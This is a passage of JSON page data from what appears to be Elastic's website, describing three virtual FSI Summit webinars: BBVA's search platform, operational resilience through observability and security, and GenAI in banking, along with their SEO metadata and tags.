example","updated_at":"2024-11-12T21:42:18.224Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/how-to-deploy-nlp-named-entity-recognition-ner-example","publish_details":{"time":"2024-11-12T21:42:22.062Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],1209],"videoEntries":[[{"uid":"blt6b65bd3a23c39589","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-18T10:04:13.291Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"How BBVA transformed data search and applications with Elastic","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eIn 2014, BBVA’s transaction data was scattered across multiple systems, limiting customers’ access to real-time banking services. The bank needed a way to unify data, improve search performance, and enhance customer experiences. In this session, \u003cstrong\u003eDavid Jiménez Ausin, Strategy Senior Manager of NoSQL \u0026amp; SQL Operational Databases at BBVA,\u003c/strong\u003e shares how Elastic helped BBVA turn a simple search engine into a functional banking platform.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eFrom fragmented to unified data: \u003c/strong\u003eBBVA expanded from 9 to over 50 integrated services, giving customers access to 20 years of transaction history instead of just one.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eLightning-fast search: \u003c/strong\u003eQueries that once took over 3 seconds now run in milliseconds, even for complex calculations.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eReducing technical debt: \u003c/strong\u003eConsolidate legacy systems and tools to lower costs and improve compliance.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eScalability at enterprise level: \u003c/strong\u003eThe system manages 45 billion data points across 120 TB, handling records with over 400 fields of information.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eDiscover how BBVA leveraged Elastic to enhance data search, optimize performance, and improve banking services at scale. Watch the session now. \u003c/p\u003e\u003cp\u003e\u003cem\u003eNote: The session is in spanish with english captions\u003c/em\u003e\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt131120489494c51f","bltd84d22abcf22f7f4"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How BBVA Used Elastic to Transform Data Search and Banking Applications","seo_description_l10n":"Learn how BBVA improved banking services with Elastic, achieving real-time search, scalable data management, and seamless customer experiences. Watch the session now.","seo_keywords_l10n":"real time search, banking applications, BBVA","seo_image":{"uid":"blt41bb768cbc6fb450","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_David Jimenez Ausin.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T09:47:43.724Z","updated_at":"2025-02-18T09:47:43.724Z","content_type":"image/png","file_size":"86857","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_David_Jimenez_Ausin.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T22:00:14.513Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt41bb768cbc6fb450/67b4573f9bea6dcaed49014f/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_David_Jimenez_Ausin.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":5,"locale":"en-us","uid":"bltfb7f539f677adbca","ACL":{},"created_at":"2019-10-23T21:44:06.532Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"spanish","label_l10n":"Spanish","tags":[],"title":"Spanish","updated_at":"2020-07-06T22:14:16.119Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-06T22:15:17.236Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"title":"Latin America","label_l10n":"Latin America","keyword":"latin-america","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltbcf2a1fc6eee5847","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-11-13T00:08:45.508Z","updated_at":"2020-11-13T00:08:45.508Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-01T23:23:58.886Z","user":"blt36e890d06c5ec32c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"uid":"bltf38f037a2b6ecb4e","title":"Log monitoring","label_l10n":"Log monitoring","keyword":"log-monitoring","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:29:28.882Z","updated_at":"2023-11-06T21:29:28.882Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.371Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt4a47bf681100e8ca","title":"Log management","label_l10n":"Log management","keyword":"log-management","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:42:23.694Z","updated_at":"2023-11-06T20:42:23.694Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.358Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"title":"Search analytics","label_l10n":"Search analytics","keyword":"search-analytics","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt6c991eb897ec7277","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:30:57.427Z","updated_at":"2023-11-06T21:30:57.427Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T12:28:49.147Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Empowering real-time banking: How BBVA transformed data search and applications with Elastic","token":"LF9MJPURRD","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T22:00:07.004Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/bbva-transformed-data-search-and-applications-with-elastic","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"NQwfkzksdXhYA6sT52VGgu","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T22:00:13.187Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt6340070245711ca0","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-18T15:35:20.545Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Driving Operational Resilience: Observability and Security in Financial Services","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs financial institutions defend against cyber threats, operational resilience is more critical than ever. In this session, Ken Exner, Chief Product Officer at Elastic, explores how integrating security and observability enhances performance and strengthens defenses.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eThe convergence of security \u0026amp; observability: \u003c/strong\u003eBoth rely on shared log data, metrics, and real-time monitoring to protect financial institutions.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eRegulatory-driven resilience:\u003c/strong\u003e New compliance mandates push firms to strengthen operational resilience, as customers equate IT outages with security failures.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eEnhanced threat detection: \u003c/strong\u003eElastic’s integrated security and observability platform helps organizations detect and respond to threats faster.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eAI-powered insights: \u003c/strong\u003eAI bridges skill gaps by automating root cause analysis and improving detection capabilities for teams of all experience levels.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eLearn how financial organizations can build a secure, resilient operational framework with integrated observability and security. Watch now to explore strategies for strengthening financial services resilience.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt0896400660d3af74"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How Financial Services Can Strengthen Operational Resilience with Security \u0026 Observability","seo_description_l10n":"Discover how financial institutions use integrated security and observability to enhance resilience and meet regulatory demands. Watch the session now.","seo_keywords_l10n":"financial services, security, observability, Operational Resilience","seo_image":{"uid":"blt0b3b89fee878785e","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Ken Exner.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T15:28:10.298Z","updated_at":"2025-02-18T15:28:10.298Z","content_type":"image/png","file_size":"107158","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Ken_Exner.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T21:36:19.045Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0b3b89fee878785e/67b4a70a07cf0fb87dca9c57/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Ken_Exner.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc8e4f4eb4eed3ccd","ACL":{},"created_at":"2023-11-06T21:42:18.209Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"infrastructure-monitoring","label_l10n":"Infrastructure monitoring","tags":[],"title":"Infrastructure monitoring","updated_at":"2023-11-06T21:42:18.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.160Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Driving Operational Resilience: Observability and Security in Financial Services","token":"TZYR2W0RR0","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T21:36:12.317Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/driving-operational-resilience-observability-and-security-in-financial-services","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"tZuCGiwEdhoV2S4QSWajQA","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T21:36:17.863Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltcffa0abb9d691da4","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-18T15:24:11.987Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Driving Innovation: GenAI Use cases in Banking","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eGenerative AI is transforming financial services, helping banks enhance customer experiences, streamline operations, and strengthen fraud detection. In this session, \u003cstrong\u003eElastic’s Senior Director of Solutions Architecture, Steve Mayzak\u003c/strong\u003e, explores how financial institutions are adopting GenAI to drive innovation.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eConversational AI for financial data: \u003c/strong\u003eAI enables natural interactions with transaction and investment data, improving research and decision-making.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eGradual AI implementation: \u003c/strong\u003eBanks start with internal tools to refine AI models before customer deployment.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eData quality matters: \u003c/strong\u003eAI’s effectiveness depends on clean, structured financial data.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eFraud prevention: \u003c/strong\u003eAI detects unusual spending patterns, helping prevent fraud in real time.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eAccuracy \u0026amp; reliability: \u003c/strong\u003eAI systems handling financial data must provide consistent and trustworthy insights.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eDiscover how financial institutions are successfully integrating GenAI to enhance banking services. \u003cstrong\u003eWatch the session\u003c/strong\u003e to explore real-world GenAI strategies in banking.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt9d00569d44cf03ea"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How Banks Are Using GenAI to Improve Services, Decision-Making, and Fraud Prevention","seo_description_l10n":"Discover how banks use GenAI to enhance customer interactions, streamline operations, and prevent fraud. Watch the session for expert insights.","seo_keywords_l10n":"financial services, genai, fraud prevention","seo_image":{"uid":"bltc78d46ce9db85bba","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Steve Mayzak.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T15:23:53.757Z","updated_at":"2025-02-18T15:23:53.757Z","content_type":"image/png","file_size":"96820","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Steve_Mayzak.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T21:32:34.410Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc78d46ce9db85bba/67b4a6095dcb771d70dcd1c4/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Steve_Mayzak.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North 